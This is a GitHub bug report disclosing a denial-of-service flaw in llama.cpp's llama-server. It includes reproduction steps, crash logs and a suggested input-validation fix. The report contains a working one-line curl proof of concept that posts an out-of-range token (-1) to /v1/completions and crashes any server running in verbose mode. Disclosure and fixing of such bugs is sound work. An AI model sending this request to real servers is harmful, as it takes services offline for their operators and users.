-
Notifications
You must be signed in to change notification settings - Fork 12.9k
Description
Name and Version
~/git/llama.cpp/build/bin/ [tags/b4798] ./llama-cli --version
register_backend: registered backend Metal (1 devices)
register_device: registered device Metal (Apple M3 Pro)
register_backend: registered backend BLAS (1 devices)
register_device: registered device BLAS (Accelerate)
register_backend: registered backend CPU (1 devices)
register_device: registered device CPU (Apple M3 Pro)
version: 4798 (1782cdf)
built with Apple clang version 16.0.0 (clang-1600.0.26.6) for arm64-apple-darwin24.3.0
Operating systems
No response
Which llama.cpp modules do you know to be affected?
llama-server
Command line
# Run the latest tag inside container
docker run --rm -it ubuntu
apt update
apt install -y wget unzip curl build-essential
wget https://github.com/ggml-org/llama.cpp/releases/download/b4798/llama-b4798-bin-ubuntu-arm64.zip
unzip llama-b4798-bin-ubuntu-arm64.zip
# Run the server
LD_LIBRARY_PATH=$(pwd)/build/bin ./build/bin/llama-server -m /tmp/DeepSeek-R1-Distill-Qwen-1.5B-Q8_0.gguf -v
# Crash the server
curl -vvvv http://localhost:8080/v1/completions -d '{"prompt":[-1]}'
Problem description & steps to reproduce
Summary
An unhandled exception crashes the server in the "v1/completions" route, if the server is running in verbose mode. An attacker can send a completion request with tokens that are not in the vocabulary / out of range, which crashes the application.
I opened an issue per your request, after closing https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-9fg6-6f9w-fgj3
Details
I recently ran into an unintended crash that can be triggered by anyone, using a single HTTP request, causing denial of service. I affects both Debug and Release builds and depends on the -v flag.
PoC
I verified the POC on 2 different OSs (Linux, MacOS) and architectures (QWEN, LLAMA). I tested it on ubuntu container and on my host (up to date M3). I tested both compiling from source but here I will use the prebuilt binaries.
Download and Run the latest llama server build with -v flag:
docker run --rm -it ubuntu
apt update
apt install -y wget unzip curl build-essential
wget https://github.com/ggml-org/llama.cpp/releases/download/b4798/llama-b4798-bin-ubuntu-arm64.zip
unzip llama-b4798-bin-ubuntu-arm64.zip
Modify the model path, I copied it with docker cp
LD_LIBRARY_PATH=$(pwd)/build/bin ./build/bin/llama-server -m /tmp/DeepSeek-R1-Distill-Qwen-1.5B-Q8_0.gguf -v
The following line will infer 2 tokens successfully to make sure the model works first:
curl -vvvv http://localhost:8080/v1/completions -d '{"prompt":[1], "max_tokens": 2}'
The following line will crash the application, which demonstrated the denial of service vulnerability by triggering uncaught exception:
curl -vvvv http://localhost:8080/v1/completions -d '{"prompt":[-1]}'
The server crashes with due to out of range error (no token mapped for the value -1) when it tries to print it to STDOUT.
que post: new task, id = 56/1, front = 0
que start_loop: processing new tasks
que start_loop: processing task, id = 56
slot get_availabl: id 0 | task 0 | selected slot by lru, t_last = 43778350372
slot reset: id 0 | task 0 |
terminate called after throwing an instance of 'std::out_of_range'
what(): vector::_M_range_check: __n (which is 18446744073709551615) >= this->size() (which is 151936)
Aborted
Impact
Any server running llama.cpp in verbose mode is subject to DOS using a single HTTP request.
Suggested behavior (opinion)
When receiving tokens as a list of integers, the server should make sure the tokens are supported in the current vocab / tokenizer. Validating every input just for verbose logging does not make sense and can be IO expensive, which is an overkill.
But, on the other hand, the user should get a clear error when invalid tokens / unsupported tokens are provided, whether or not the server runs in verbose mode. It might also skip tokens that are not known when printing them by checking the value has a mapping and is in the supported range.
Thanks in advance!
First Bad Commit
No response
Relevant log output
que post: new task, id = 56/1, front = 0
que start_loop: processing new tasks
que start_loop: processing task, id = 56
slot get_availabl: id 0 | task 0 | selected slot by lru, t_last = 43778350372
slot reset: id 0 | task 0 |
terminate called after throwing an instance of 'std::out_of_range'
what(): vector::_M_range_check: __n (which is 18446744073709551615) >= this->size() (which is 151936)
Aborted